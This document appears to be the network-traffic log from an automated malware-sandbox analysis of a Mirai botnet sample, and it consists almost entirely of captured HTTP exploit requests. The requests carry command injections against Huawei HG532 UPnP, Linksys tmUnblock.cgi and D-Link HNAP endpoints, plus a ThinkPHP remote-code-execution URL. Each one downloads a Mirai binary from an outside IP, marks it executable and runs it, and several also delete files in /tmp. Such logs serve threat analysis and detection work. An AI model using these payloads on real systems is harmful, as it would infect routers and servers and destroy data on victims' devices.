| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
